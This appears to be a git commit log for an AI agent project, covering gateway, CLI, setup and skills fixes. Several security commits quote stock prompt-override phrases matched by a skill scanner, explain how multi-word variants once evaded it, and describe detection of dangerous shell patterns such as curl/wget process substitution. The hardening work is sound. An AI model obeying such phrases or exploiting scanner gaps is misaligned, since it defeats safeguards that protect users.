2026-03-05 01:58:33 -08:00
teknium1
2465674fda Merge PR #280: fix: add missing dangerous command patterns (tee, process substitution, full-path rm)
Authored by dogiladeveloper. Adds detection for tee writes to sensitive files, process substitution with curl/wget, and find -exec with full-path rm.
2026-03-05 01:56:44 -08:00
teknium1
2eca0d4af1 Merge PR #275: fix(batch_runner): preserve traceback when batch worker fails
Authored by batuhankocyigit. Adds explicit traceback logging for batch worker failures and improves tool dispatch error logging in registry.
2026-03-05 01:44:05 -08:00
teknium1
11a7c6b112 fix: update mock agent signature to accept task_id after PR #419
The _Codex401ThenSuccessAgent mock overrides run_conversation() but was
missing the task_id parameter, causing a TypeError in the gateway test.
2026-03-05 01:41:50 -08:00
teknium1
50ea8adf46 Merge PR #419: fix: pass stable task_id in CLI and gateway to preserve sandbox state across turns
Authored by rovle. Passes session_id as task_id to run_conversation()
in both CLI and gateway, so container backends (Docker/Modal/Singularity)
reuse the same sandbox across turns. Also passes task_id through to
_create_environment() in file_tools.py.

Cherry-picked from original PR branch (which had unrelated divergent
commits from the contributor's fork).
2026-03-05 01:40:13 -08:00
rovle
ca33372595 fix: pass task_id to _create_environment as well, to prevent cross-session state mixing
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
rovle
7d47e3b776 fix: pass stable task_id in CLI and gateway to preserve sandbox state across turns
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
teknium1
fe15a2c65c Merge PR #274: fix(setup): handle TerminalMenu init failures with safe fallback
Authored by jdblackstar. Catches runtime exceptions from TerminalMenu
init (e.g. CalledProcessError from tput with unknown TERM like
xterm-ghostty over SSH) and falls through to the text-based menu.
2026-03-05 01:26:58 -08:00
teknium1
d400fb8b23 feat: add /update slash command for gateway platforms
Adds a /update command to Telegram, Discord, and other gateway platforms
that runs `hermes update` to pull the latest code, update dependencies,
sync skills, and restart the gateway.

Implementation:
- Spawns `hermes update` in a separate systemd scope (systemd-run --user
  --scope) so the process survives the gateway restart that hermes update
  triggers at the end. Falls back to nohup if systemd-run is unavailable.
- Writes a marker file (.update_pending.json) with the originating
  platform and chat_id before spawning the update.
- On gateway startup, _send_update_notification() checks for the marker,
  reads the captured update output, sends the results back to the user,
  and cleans up.

Also:
- Registers /update as a Discord slash command
- Updates README.md, docs/messaging.md, docs/slash-commands.md
- Adds 18 tests covering handler, notification, and edge cases
2026-03-05 01:20:58 -08:00
Dev User
3221818b6e fix: respect OPENAI_BASE_URL when resolving API key priority
When base_url points to a non-OpenRouter endpoint (e.g. Z.ai),
OPENROUTER_API_KEY incorrectly takes priority over OPENAI_API_KEY,
sending the wrong credentials. This causes 401 errors on the main
inference path and forces users to comment out OPENROUTER_API_KEY,
which then breaks auxiliary clients (compression, vision).

Fix: check whether base_url contains "openrouter" and swap the key
priority accordingly. Also adds GLM-4.7 and GLM-5 context lengths
to DEFAULT_CONTEXT_LENGTHS.
2026-03-05 08:25:16 +00:00
teknium1
2af2f148ab refactor: rewrite duckduckgo-search skill for accuracy and usability
Follow-up to PR #267 merge:
- Fix CLI syntax: -k is keywords, -m is max results (was reversed)
- Add clear trigger condition: use only when web_search tool unavailable
- Remove misleading curl fallback (DuckDuckGo Instant Answer API is not
  a web search endpoint)
- Fix package name: ddgs (renamed from duckduckgo-search)
- Add workflow section for search → web_extract pipeline
- Add pitfalls and limitations sections
- Fix author attribution to actual contributor
- Rewrite shell script as simple ddgs wrapper with availability check
2026-03-04 22:11:09 -08:00
teknium1
d19109742e Merge PR #267: feat(skills): add DuckDuckGo search skill as Firecrawl fallback
Authored by gamedevCloudy. Adds a free web search skill for users without
FIRECRAWL_API_KEY, using the ddgs library or curl.
2026-03-04 22:09:07 -08:00
teknium1
078e2e4b19 fix(cli): Ctrl+C clears input buffer before exiting
Previously, pressing Ctrl+C while text was typed in the input prompt
would immediately exit Hermes. Now follows standard shell behavior:

- Text in buffer → Ctrl+C clears the line (like bash)
- Empty buffer → Ctrl+C exits

This means accidentally hitting Ctrl+C while composing a message just
clears the input instead of killing the session. A second Ctrl+C on
the empty prompt still exits as expected.
2026-03-04 22:01:13 -08:00
teknium1
9aa2999388 Merge PR #393: fix(whatsapp): initialize data variable and close log handle on error paths
Authored by FarukEst. Fixes #392.

1. Initialize data={} before health-check loop to prevent NameError when
   resp.json() raises after http_ready is set to True.
2. Extract _close_bridge_log() helper and call on all return False paths
   to prevent file descriptor leaks on failed connection attempts.
   Refactors disconnect() to reuse the same helper.
2026-03-04 21:49:53 -08:00
teknium1
d0d9897e81 refactor: clean up transcription_tools after PR #262 merge
- Fix incorrect error message (only VOICE_TOOLS_OPENAI_KEY is checked,
  not OPENAI_API_KEY)
- Remove redundant FileNotFoundError catch (exists() check above
  already handles this)
- Consolidate openai imports to single line
- Sort SUPPORTED_FORMATS in error message for deterministic output
2026-03-04 21:35:04 -08:00
teknium1
9306a1e06a Merge PR #262: improve error handling and validation in transcription_tools
Authored by aydnOktay. Adds file format and size validation before API calls,
specific exception handling, and improved logging.
2026-03-04 21:33:03 -08:00
teknium1
141b12bd39 refactor: clean up type hints and docstrings in session_search_tool
Follow-up to PR #261 merge:
- Fix Optional[Any] → Union[int, float, str, None] (actually meaningful)
- Fix _resolve_to_parent return type to str (never returns None in practice)
- Trim verbose docstrings on internal helpers to single-line style
- Correct docstring that claimed 'unknown' on failure (returns str(ts))
2026-03-04 21:25:54 -08:00
teknium1
ae3deff8d4 Merge PR #261: improve error handling and type hints in session_search_tool
Authored by aydnOktay. Adds TimeoutError handling for session summarization,
better exception specificity in _format_timestamp, defensive try/except in
_resolve_to_parent, and type hints.
2026-03-04 21:23:56 -08:00
teknium1
41adca4e77 fix: strip internal fields from API messages in _handle_max_iterations
The flush_memories() and run_conversation() code paths already stripped
finish_reason and reasoning from API messages (added in 7a0b377 via PR
#253), but _handle_max_iterations() was missed. It was sending raw
messages.copy() which could include finish_reason, causing 422 errors
on strict APIs like Mistral when the agent hit max iterations.

Now strips the same internal fields consistently across all three API
call sites.
2026-03-04 21:08:20 -08:00
teknium1
8e901b31c1 Merge PR #214: fix: align _apply_delete comment with actual behavior
Authored by VolodymyrBg.
2026-03-04 20:47:47 -08:00
teknium1
11a5a64729 feat: add emojicombos.com as primary ASCII art search source
emojicombos.com has a huge curated collection of ASCII art, dot art,
kaomoji, and emoji combos searchable via web_extract with a simple
URL pattern: https://emojicombos.com/{term}-ascii-art

No API key needed. Returns modern/meme art, pop culture references,
and kaomoji alongside classic ASCII art. Added as Source A (recommended
first) before asciiart.eu (Source B, classic archive).

Also added GitHub Octocat API as a fun easter egg and kaomoji search
to the decision flow.
2026-03-04 20:23:36 -08:00
teknium1
0dba3027c1 feat: expand ascii-art skill with cowsay, boxes, toilet, image-to-ascii
Adds 5 additional tools from the awesome-ascii-art ecosystem:
- cowsay: 50+ characters with speech/thought bubbles
- boxes: 70+ decorative border designs, composable with pyfiglet
- toilet: colored text art with rainbow/metal/border filters
- ascii-image-converter: modern image-to-ASCII (PNG/JPEG/GIF/WEBP)
- jp2a: lightweight JPEG-to-ASCII fallback

Also adds fun extras (Star Wars telnet), resource links, and
an expanded decision flow covering all 7 modes.

Ref: github.com/moul/awesome-ascii-art
2026-03-04 20:16:38 -08:00
teknium1
405c7e08be feat: enhance ascii-art skill with pyfiglet and asciiart.eu search
Adds two primary modes on top of the original LLM-generation approach:
- Mode 1: pyfiglet (571 fonts, pip install, no API key) for text banners
- Mode 2: asciiart.eu search (11,000+ pieces) via web_extract for pre-made art
- Mode 3: LLM-generated art using Unicode palette (original PR, now fallback)

Includes decision flow, font recommendations, and category reference.
2026-03-04 20:01:08 -08:00
teknium1
cb36930f1d Merge PR #209: add ascii-art skill for creative text banners and art
Authored by 0xbyt4.

Initial skill with Unicode character palette and style guide for
LLM-generated ASCII art.
2026-03-04 19:59:13 -08:00
teknium1
90e6fa2612 Merge PR #204: fix Telegram italic regex newline bug
Authored by 0xbyt4.

The italic regex [^*]+ matched across newlines, corrupting bullet lists
using * markers (e.g. '* Item one\n* Item two' became italic garbage).
Fixed by adding \n to the negated character class: [^*\n]+.
2026-03-04 19:52:03 -08:00
teknium1
fd22ae5fcb Merge PR #203: add unit tests for trajectory_compressor
Authored by 0xbyt4.

25 tests covering CompressionConfig, TrajectoryMetrics, AggregateMetrics,
protected indices, content extraction, and token counting.
2026-03-04 19:48:19 -08:00
teknium1
e1baab90f7 Merge PR #201: fix skills hub dedup to prefer higher trust levels
Authored by 0xbyt4.

The dedup logic in GitHubSource.search() and unified_search() used
'r.trust_level == "trusted"' which let trusted results overwrite builtin
ones. Now uses ranked comparison: builtin (2) > trusted (1) > community (0).
2026-03-04 19:40:41 -08:00
teknium1
4fcfa329ba Merge PR #200: fix extract_images and truncate_message bugs in platform base
Authored by 0xbyt4.

Two fixes:
- extract_images(): only remove extracted image tags, not all markdown image
  tags. Previously ![doc](report.pdf) was silently dropped when real images
  were also present.
- truncate_message(): walk chunk_body not full_chunk when tracking code block
  state, so the reopened fence prefix doesn't toggle in_code off and leave
  continuation chunks with unclosed code blocks.
2026-03-04 19:37:58 -08:00
teknium1
b336980229 Merge PR #193: add unit tests for 5 security/logic-critical modules (batch 4)
Authored by 0xbyt4.

144 new tests covering gateway/pairing.py, tools/skill_manager_tool.py,
tools/skills_tool.py, honcho_integration/session.py, and
agent/auxiliary_client.py.
2026-03-04 19:35:01 -08:00
teknium1
7128f95621 Merge PR #390: fix hidden directory filter broken on Windows
Authored by Farukest. Fixes #389.

Replaces hardcoded forward-slash string checks ('/.git/', '/.hub/') with
Path.parts membership test in _find_all_skills() and scan_skill_commands().
On Windows, str(Path) uses backslashes so the old filter never matched,
causing quarantined skills to appear as installed.
2026-03-04 19:22:43 -08:00
teknium1
ffc6d767ec Merge PR #388: fix --force bypassing dangerous verdict in should_allow_install
Authored by Farukest. Fixes #387.

Removes 'and not force' from the dangerous verdict check so --force
can never install skills with critical security findings (reverse shells,
data exfiltration, etc). The docstring already documented this behavior
but the code didn't enforce it.
2026-03-04 19:19:57 -08:00
teknium1
44a2d0c01f Merge PR #386: fix symlink boundary check prefix confusion in skills_guard
Authored by Farukest. Fixes #385.

Replaces startswith() with Path.is_relative_to() in _check_structure()
symlink escape check — same fix pattern as skill_view() (PR #352).
Prevents symlinks escaping to sibling directories with shared name prefixes.
2026-03-04 19:13:21 -08:00
teknium1
3e2ed18ad0 fix: fallback to main model endpoint when auxiliary summary client fails
When the auxiliary client (used for context compression summaries) fails
— e.g. due to a stale OpenRouter API key after switching to a local LLM
— fall back to the user's active endpoint (OPENAI_BASE_URL) instead of
returning a useless static summary string.

This handles the common scenario where a user switches providers via
'hermes model' but the old provider's API key remains in .env. The
auxiliary client picks up the stale key, fails (402/auth error), and
previously compression would produce garbage. Now it gracefully retries
with the working endpoint.

On successful fallback, the working client is cached for future
compressions in the same session so the fallback cost is paid only once.

Ref: #348
2026-03-04 17:58:09 -08:00
teknium1
db58cfb13d Merge PR #269: Fix nous refresh token rotation failure on key mint failure
Fixes a bug where the refresh token was not persisted when the API key
mint failed (e.g., 402 insufficient credits, timeout). The rotated
refresh token was lost, causing subsequent auth attempts to fail with
a stale token.

Changes:
- Persist auth state immediately after each successful token refresh,
  before attempting the mint
- Use latest in-memory refresh token on mint-retry paths (was using
  the stale original)
- Atomic durable writes for auth.json (temp file + fsync + replace)
- Opt-in OAuth trace logging (HERMES_OAUTH_TRACE=1, fingerprint-only)
- 3 regression tests covering refresh+402, refresh+timeout, and
  invalid-token retry behavior

Author: Robin Fernandes <rewbs>
2026-03-04 17:52:10 -08:00
teknium1
3220bb8aaa Merge PR #403: Fix context overrun crash with local LLM backends
Authored by ch3ronsa. Fixes #348.

Adds 'context size' (LM Studio) and 'context window' (Ollama) to
context-length error detection phrases so local backend 400 errors
trigger compression instead of aborting. Also removes 'error code: 400'
from the non-retryable error list as defense in depth.
2026-03-04 17:48:44 -08:00
teknium1
ff3a479156 fix: coerce session_id and data to string in process tool handler
Some models send session_id as an integer instead of a string, causing
type errors downstream. Defensively cast session_id and write/submit
data args to str to handle non-compliant model outputs.
2026-03-04 16:37:00 -08:00
teknium1
6f4941616d fix(gateway): include history_offset in error return path
The error return (no final_response) was missing history_offset,
falling back to len(history) which has the same session_meta offset
bug fixed in PR #395. Now both return paths include the correct
filtered history length.
2026-03-04 16:26:53 -08:00
teknium1
bd3025d669 Merge PR #395: fix(gateway): use filtered history length for transcript message extraction
Authored by PercyDikec. Fixes #394.

The transcript extraction used len(history) to find new messages, but
history includes session_meta entries stripped before reaching the agent.
This caused 1 message lost per turn from turn 2 onwards. Fix returns
history_offset (filtered length) from _run_agent and uses it for the slice.
2026-03-04 16:25:09 -08:00
teknium1
4c72329412 feat: add backend validation for required binaries in setup wizard
Implemented checks to ensure that necessary binaries (Docker, Singularity, SSH) are installed for the selected backend in the setup wizard. If a required binary is missing, the user is prompted to proceed with a fallback to the local backend. This enhances user experience by preventing potential runtime errors due to missing dependencies.
2026-03-04 14:49:23 -08:00
teknium1
8311e8984b fix: preflight context compression + error handler ordering for model switches
Two fixes for the case where a user switches to a model with a smaller
context window while having a large existing session:

1. Preflight compression in run_conversation(): Before the main loop,
   estimate tokens of loaded history + system prompt. If it exceeds the
   model's compression threshold (85% of context), compress proactively
   with up to 3 passes. This naturally handles model switches because
   the gateway creates a fresh AIAgent per message with the current
   model's context length.

2. Error handler reordering: Context-length errors (400 with 'maximum
   context length' etc.) are now checked BEFORE the generic 4xx handler.
   Previously, OpenRouter's 400-status context-length errors were caught
   as non-retryable client errors and aborted immediately, never reaching
   the compression+retry logic.

Reported by Sonicrida on Discord: 840-message session (2MB+) crashed
after switching from a large-context model to minimax via OpenRouter.
2026-03-04 14:42:41 -08:00
teknium1
093acd72dd fix: catch exceptions from check_fn in is_toolset_available()
get_definitions() already wrapped check_fn() calls in try/except,
but is_toolset_available() did not. A failing check (network error,
missing import, bad config) would propagate uncaught and crash the
CLI banner, agent startup, and tools-info display.

Now is_toolset_available() catches all exceptions and returns False,
matching the existing pattern in get_definitions().

Added 4 tests covering exception handling in is_toolset_available(),
check_toolset_requirements(), get_definitions(), and
check_tool_availability().

Closes #402
2026-03-04 14:22:30 -08:00
Vicaversa
e9ab711b66 Fix context overrun crash with local LLM backends (fixes #348)
Local backends (LM Studio, Ollama, llama.cpp) return HTTP 400
with messages like "Context size has been exceeded" when the
context window is full. The error phrase list did not include
"context size" or "context window", so these errors fell through
to the generic 4xx abort handler instead of triggering compression.

Changes:
- Move context-length check above generic 4xx handler so it runs
  first (same pattern as the existing 413 check)
- Add "context size" and "context window" to the phrase list
- Guard 4xx handler with `not is_context_length_error` to prevent
  context-related 400s from being treated as non-retryable
2026-03-05 01:12:34 +03:00
teknium1
b2a9f6beaa feat: enable up/down arrow history navigation in CLI
The TextArea uses multiline=True, so up/down arrows only moved the
cursor within text — history browsing via FileHistory was attached
but inaccessible.

Two fixes:
1. Add up/down key bindings in normal input mode that call
   Buffer.auto_up()/auto_down(). These intelligently handle both:
   cursor movement when editing multi-line text, and history
   browsing when on the first/last line.

2. Pass append_to_history=True to buffer.reset() in the Enter
   handler so messages actually get saved to ~/.hermes_history.

History persists across sessions via FileHistory. The bindings are
filtered out during clarify, approval, and sudo prompts (which
have their own up/down handlers).
2026-03-04 13:39:48 -08:00
PercyDikec
d3504f84af fix(gateway): use filtered history length for transcript message extraction
The transcript extraction used len(history) to find new messages, but
history includes session_meta entries that are stripped before passing
to the agent. This mismatch caused 1 message to be lost from the
transcript on every turn after the first, because the slice offset
was too high. Use the filtered history length (history_offset) returned
by _run_agent instead.

Also changed the else branch from returning all agent_messages to
returning an empty list, so compressed/shorter agent output does not
duplicate the entire history into the transcript.
2026-03-04 21:34:40 +03:00
Farukest
34badeb19c fix(whatsapp): initialize data variable and close log handle on error paths 2026-03-04 19:11:48 +03:00
Farukest
f93b48226c fix: use Path.parts for hidden directory filter in skill listing
The hidden directory filter used hardcoded forward-slash strings like
'/.git/' and '/.hub/' to exclude internal directories. On Windows,
Path returns backslash-separated strings, so the filter never matched.

This caused quarantined skills in .hub/quarantine/ to appear as
installed skills and available slash commands on Windows.

Replaced string-based checks with Path.parts membership test which
works on both Windows and Unix.
2026-03-04 18:34:16 +03:00
Farukest
4805be0119 fix: prevent --force from overriding dangerous verdict in should_allow_install
The docstring states --force should never override dangerous verdicts,
but the condition `if result.verdict == "dangerous" and not force`
allowed force=True to skip the early return. Execution then fell
through to `if force: return True`, bypassing the policy block.

Removed `and not force` so dangerous skills are always blocked
regardless of the --force flag.
2026-03-04 18:10:18 +03:00
Farukest
a3ca71fe26 fix: use is_relative_to() for symlink boundary check in skills_guard
The symlink escape check in _check_structure() used startswith()
without a trailing separator. A symlink resolving to a sibling
directory with a shared prefix (e.g. 'axolotl-backdoor') would pass
the check for 'axolotl' since the string prefix matched.

Replaced with Path.is_relative_to() which correctly handles directory
boundaries and is consistent with the skill_view path check.
2026-03-04 17:23:23 +03:00
teknium1
70a0a5ff4a fix: exclude current session from session_search results
session_search was returning the current session if it matched the
query, which is redundant — the agent already has the current
conversation context. This wasted an LLM summarization call and a
result slot.

Added current_session_id parameter to session_search(). The agent
passes self.session_id and the search filters out any results where
either the raw or parent-resolved session ID matches. Both the raw
match and the parent-resolved match are checked to handle child
sessions from delegation.

Two tests added verifying the exclusion works and that other
sessions are still returned.
2026-03-04 06:06:40 -08:00
teknium1
021f62cb0c fix(security): patch multi-word bypass in 8 more injection patterns
Systematic audit of all prompt injection regexes in skills_guard.py
found 8 more patterns with the same single-word gap vulnerability
fixed in PR #192. Multi-word variants like 'pretend that you are',
'output the full system prompt', 'respond without your safety
filters', etc. all bypassed the scanner.

Fixed patterns:
- you are [now] → you are [... now]
- do not [tell] the user → do not [... tell ... the] user
- pretend [you are|to be] → pretend [... you are|to be]
- output the [system|initial] prompt → output [... system|initial] prompt
- act as if you [have no] [restrictions] → act as if [... you ... have no ... restrictions]
- respond without [restrictions] → respond without [... restrictions]
- you have been [updated] to → you have been [... updated] to
- share [the] [entire] [conversation] → share [... conversation]

All use (?:\w+\s+)* to allow arbitrary intermediate words.
2026-03-04 06:00:41 -08:00
teknium1
ba214e43c8 fix(security): apply same multi-word bypass fix to disregard pattern
The 'disregard ... instructions/rules/guidelines' regex had the
same single-word gap vulnerability as the 'ignore' pattern fixed
in PR #192. 'disregard all your instructions' bypassed the scanner.

Added (?:\w+\s+)* between both keyword groups to allow arbitrary
intermediate words.
2026-03-04 05:55:38 -08:00
teknium1
520a26c48f Merge PR #192: fix(security): catch multi-word prompt injection bypass in skills_guard
Authored by 0xbyt4.

The 'ignore ... instructions' regex only matched a single word between
'ignore' and the keyword (previous/all/above/prior). Multi-word variants
like 'ignore all prior instructions' bypassed the scanner entirely.
2026-03-04 05:54:04 -08:00
teknium1
a787a0d60b Merge PR #317: fix(setup): improve shell config detection for PATH setup
Authored by mehmetkr-31. Related to #202.

Checks $SHELL env var first to pick the right config file (.zshrc
vs .bashrc) instead of relying on file existence, which could pick
the wrong file on macOS. Falls back to file-existence checks for
non-standard shells. Creates the config file with touch if it was
selected but doesn't exist yet.
2026-03-04 05:46:24 -08:00
teknium1
8d2d8cc728 refactor: add exception handling and docstring to has_any_sessions
Wrap session_count() in try/except so a DB error falls through to
the heuristic fallback instead of crashing. Added a detailed
docstring explaining why the DB approach is needed and the > 1
assumption (current session already exists when called).
2026-03-04 05:38:54 -08:00
teknium1
4ae61b0886 Merge PR #370: fix(session): use database session count for has_any_sessions
Authored by Bartok9. Fixes #351.
2026-03-04 05:37:15 -08:00
teknium1
79871c2083 refactor: use Path.is_relative_to() for skill_view boundary check
Replace the string-based startswith + os.sep approach with
Path.is_relative_to() (Python 3.9+, we require 3.10+). This is
the idiomatic pathlib way to check path containment — it handles
separators, case sensitivity, and the equal-path case natively
without string manipulation.

Simplified tests to match: removed the now-unnecessary
test_separator_is_os_native test since is_relative_to doesn't
depend on separator choice.
2026-03-04 05:30:43 -08:00
teknium1
7796ac1411 Merge PR #354: fix: use os.sep in skill_view path boundary check for Windows compatibility
Authored by Farukest. Fixes #353.
2026-03-04 05:17:36 -08:00
teknium1
c45aeb45b1 fix(whatsapp): wait for connected status and log bridge output
The gateway health check broke out of the polling loop as soon as
the bridge HTTP server returned 200, regardless of the actual
WhatsApp connection status. This meant 'Bridge ready (status:
disconnected)' was printed and the gateway moved on, even when
WhatsApp never connected.

Additionally, bridge stdout/stderr were piped to DEVNULL, so if the
session had expired and the bridge needed a QR re-scan, the user had
no way to see that. The 'Scan QR code if prompted (check bridge
output)' message was misleading since there was no output to check.

Changes:
- Health check now has two phases: wait for HTTP (15s), then wait
  for status:connected (15s more). Total 30s budget.
- Bridge output routes to ~/.hermes/whatsapp/bridge.log instead of
  DEVNULL — QR codes, errors, reconnection msgs are preserved.
- Clear warnings with actionable steps if connection fails after 30s
  (check bridge.log, re-pair with hermes whatsapp).
- Removed misleading 'Scan QR code' message.
- Log file handle properly cleaned up on disconnect.

Fixes #365
2026-03-04 04:58:28 -08:00
teknium1
ee7fde6531 feat: add OpenThoughts-TBLite evaluation script
Introduced a new evaluation script for the OpenThoughts-TBLite environment, enabling users to run evaluations with customizable options. The script includes logging capabilities and real-time output, enhancing the evaluation process for terminal agents. This addition complements the existing benchmarking tools and improves usability for users.
2026-03-04 12:55:56 +00:00
teknium1
0ea6c34325 feat: add OpenThoughts-TBLite evaluation environment and configuration files
Introduced a new evaluation environment for OpenThoughts-TBLite, including the main evaluation script, configuration YAML, and README documentation. This environment provides a faster alternative to Terminal-Bench 2.0, featuring 100 difficulty-calibrated tasks for terminal agents. The setup allows for easy evaluation and configuration, enhancing the benchmarking capabilities for terminal agents.
2026-03-04 11:42:41 +00:00
teknium1
3db3d60368 refactor: extract build_session_key() as single source of truth
The session key construction logic was duplicated in 4 places
(session.py + 3 inline copies in run.py), which is exactly the
kind of drift that caused issue #349 in the first place.

Extracted build_session_key() as a public function in session.py.
SessionStore._generate_session_key() now delegates to it, and all
inline key construction in run.py has been replaced with calls to
the shared function. Tests updated to test the function directly.
2026-03-04 03:34:45 -08:00
teknium1
bfd08d5648 Merge PR #350: fix(gateway): match _quick_key to _generate_session_key for WhatsApp DMs
Authored by Farukest. Fixes #349.
2026-03-04 03:31:13 -08:00
teknium1
7f9777a0b0 feat: add container resource configuration prompts in setup wizard
Introduced interactive prompts for configuring container resource settings (CPU, memory, disk, persistence) during the setup wizard. Updated the default configuration to include these settings and improved user guidance on their implications for Docker, Singularity, and Modal backends. This enhancement aims to streamline the setup process and provide users with clearer options for resource management.
2026-03-04 03:29:05 -08:00
Bartok Moltbot
87a16ad2e5 fix(session): use database session count for has_any_sessions (#351)
The previous implementation used `len(self._entries) > 1` to check if any
sessions had ever been created. This failed for single-platform users because
when sessions reset (via /reset, auto-reset, or gateway restart), the entry
for the same session_key is replaced in _entries, not added. So len(_entries)
stays at 1 for users who only use one platform.

Fix: Query the SQLite database's session count instead. The database preserves
historical session records (marked as ended), so session_count() correctly
returns > 1 for returning users even after resets.

This prevents the agent from reintroducing itself to returning users after
every session reset.

Fixes #351
2026-03-04 03:34:57 -05:00
Vicaversa
f90a627f9a fix(gateway): add missing UTF-8 encoding to file I/O preventing crashes on Windows
On Windows, Python's open() defaults to the system locale encoding
(e.g. cp1254 for Turkish, cp1252 for Western European) instead of
UTF-8. The gateway already uses ensure_ascii=False in json.dumps()
to preserve Unicode characters in chat messages, but the
corresponding open() calls lack encoding="utf-8". This mismatch
causes UnicodeEncodeError / UnicodeDecodeError when users send
non-ASCII messages (Turkish, Japanese, Arabic, emoji, etc.) through
Telegram, Discord, WhatsApp, or Slack on Windows.

The project already fixed this for .env files in hermes_cli/config.py
(line 624) but the gateway module was missed.

Files fixed:
- gateway/session.py: session index + JSONL transcript read/write (5 calls)
- gateway/channel_directory.py: channel directory read/write (3 calls)
- gateway/mirror.py: session index read + transcript append (2 calls)
2026-03-04 11:32:57 +03:00
teknium1
152e0800e6 feat: add detailed setup instructions for Telegram, Discord, and Slack platforms
Enhanced the gateway setup process by including step-by-step setup instructions for Telegram, Discord, and Slack. Updated help prompts for environment variables to reference these new instructions, improving user guidance during the configuration of messaging platforms. This change aims to streamline the onboarding experience for users setting up their bots.
2026-03-03 20:05:15 -08:00
teknium1
d8f10fa515 feat: implement allowlist feature for user access in gateway setup
Enhanced the gateway setup process by introducing an allowlist feature for user IDs, improving security by denying access by default. Updated prompts to guide users in configuring allowed users for Telegram, Discord, and Slack platforms, and refined messaging for handling unauthorized users. This change aims to enhance user experience and security during the setup process.
2026-03-03 19:55:06 -08:00
Farukest
e86f391cac fix: use os.sep in skill_view path boundary check for Windows compatibility 2026-03-04 06:50:06 +03:00
Farukest
e39de2e752 fix(gateway): match _quick_key to _generate_session_key for WhatsApp DMs 2026-03-04 06:34:46 +03:00
teknium1
1538be45de fix: improve gateway setup messaging for non-interactive environments
Updated the gateway setup function to provide clearer messaging when no terminal is available, enhancing user understanding of the installation process. This change ensures that users are informed to run 'hermes gateway install' later if the setup is skipped due to terminal unavailability.
2026-03-03 19:34:05 -08:00
teknium1
95e3f4b001 refactor: enhance gateway service setup messaging and installation prompts
Updated the setup wizard to improve clarity around gateway service installation and management. Added prompts for users to install and start the gateway as a system service on Linux and macOS, while refining messaging for home channel configuration. This enhances the overall user experience during the setup process.
2026-03-03 19:31:16 -08:00
teknium1
b7821b6dc1 enhance: improve gateway setup messaging and service installation prompts
Updated the gateway setup function to provide clearer messaging regarding the installation status of the gateway service. Added prompts for installing the service as a background process on supported platforms (Linux and macOS) and clarified next steps for users. Improved user experience by offering options to start the service immediately or run it in the foreground.
2026-03-03 19:30:05 -08:00
teknium1
556a132f2d refactor: update platform status function to return plain-text strings
Modified the _platform_status function in gateway.py to return uncolored plain-text status strings for platforms, ensuring compatibility with simple_term_menu items. Additionally, removed emoji characters from the status display in the gateway setup menu for improved readability.
2026-03-03 19:04:32 -08:00
teknium1
fafb9c23bf fix: strip emoji characters from menu choices in interactive setup
Updated the interactive setup in hermes CLI to remove emoji characters from menu choices. This change addresses visual issues caused by emoji miscalculations during terminal redraws, ensuring a cleaner and more readable interface for users.
2026-03-03 19:02:33 -08:00
teknium1
1754bdf1e8 docs: update AGENTS.md, README.md, and messaging.md to include interactive setup for messaging platforms
Enhanced documentation to reflect the new interactive setup command for configuring messaging platforms (Telegram, Discord, Slack, WhatsApp). Updated sections in AGENTS.md, README.md, and messaging.md to provide clear instructions on using the 'hermes gateway setup' command, improving user experience and accessibility for platform configuration.
2026-03-03 19:00:09 -08:00
teknium1
fa3d7b3d03 feat: add interactive setup for messaging platforms in gateway CLI
Enhanced the hermes CLI gateway with a new 'setup' command to configure messaging platforms (Telegram, Discord, Slack, WhatsApp). This includes prompts for necessary environment variables and improved user experience for platform configuration. Updated documentation to reflect the new command.
2026-03-03 18:57:33 -08:00
teknium1
73f2998d48 fix: update setup wizard logic to handle terminal availability
Modified the setup wizard to ensure it only skips execution when no terminal is available, improving compatibility with piped installations. Additionally, updated environment variable checks to use bool() for accurate provider configuration detection, addressing potential issues with empty values in .env files.
2026-03-03 18:40:30 -08:00
teyrebaz33
6a51fd23df feat: add AgentMail skill for agent-owned email inboxes (#329) 2026-03-03 22:20:35 +03:00
teknium1
ffec21236d feat: enhance Home Assistant integration with service discovery and setup
Improvements to the HA integration merged from PR #184:

- Add ha_list_services tool: discovers available services (actions) per
  domain with descriptions and parameter fields. Tells the model what
  it can do with each device type (e.g. light.turn_on accepts brightness,
  color_name, transition). Closes the gap where the model had to guess
  available actions.

- Add HA to hermes tools config: users can enable/disable the homeassistant
  toolset and configure HASS_TOKEN + HASS_URL through 'hermes tools' setup
  flow instead of manually editing .env.

- Fix should-fix items from code review:
  - Remove sys.path.insert hack from gateway adapter
  - Replace all print() calls with proper logger (info/warning/error)
  - Move env var reads from import-time to handler-time via _get_config()
  - Add dedicated REST session reuse in gateway send()

- Update ha_call_service description to reference ha_list_services for
  action discovery.

- Update tests for new ha_list_services tool in toolset resolution.
2026-03-03 05:16:53 -08:00
teknium1
db0521ce0e Merge PR #184: feat: Home Assistant integration (REST tools + WebSocket gateway)
Authored by 0xbyt4. Adds smart home control via REST tools (ha_list_entities,
ha_get_state, ha_call_service) with domain blocklist and entity_id validation,
plus WebSocket gateway adapter for real-time event monitoring.

Also includes Gemini 3 thought_signature preservation fix (extra_content on
tool calls) needed for multi-turn tool calling via OpenRouter.
2026-03-03 05:01:39 -08:00
areu01or00
a1c25046a9 fix(timezone): add timezone-aware clock across agent, cron, and execute_code 2026-03-03 18:23:40 +05:30
teknium1
de0af4df66 refactor: enhance software-development skills with Hermes integration
Improvements to all 5 skills adapted from obra/superpowers:

- Restored anti-rationalization tables and red flags from originals
  (key behavioral guardrails that prevent LLMs from taking shortcuts)
- Restored 'Rule of Three' for debugging (3+ failed fixes = question
  architecture, not keep fixing)
- Restored Pattern Analysis and Hypothesis Testing phases in debugging
- Restored 'Why Order Matters' rebuttals and verification checklist in TDD
- Added proper Hermes delegate_task integration with real parameter examples
  and toolset specifications throughout
- Added Hermes tool usage (search_files, read_file, terminal) for
  investigation and verification steps
- Removed references to non-existent skills (brainstorming,
  finishing-a-development-branch, executing-plans, using-git-worktrees)
- Removed generic language-specific sections (Go, Rust, Jest) that
  added bulk without agent value
- Tightened prose — cut ~430 lines while adding more actionable content
- Added execution handoff section to writing-plans
- Consistent cross-references between the 5 skills
2026-03-03 04:08:56 -08:00
teknium1
0e1723ef74 Merge PR #137: feat: Add Superpowers software development skills
Authored by kaos35. Adds 5 software development workflow skills adapted
from obra/superpowers: test-driven-development, systematic-debugging,
subagent-driven-development, writing-plans, requesting-code-review.
2026-03-03 04:00:00 -08:00
0xbyt4
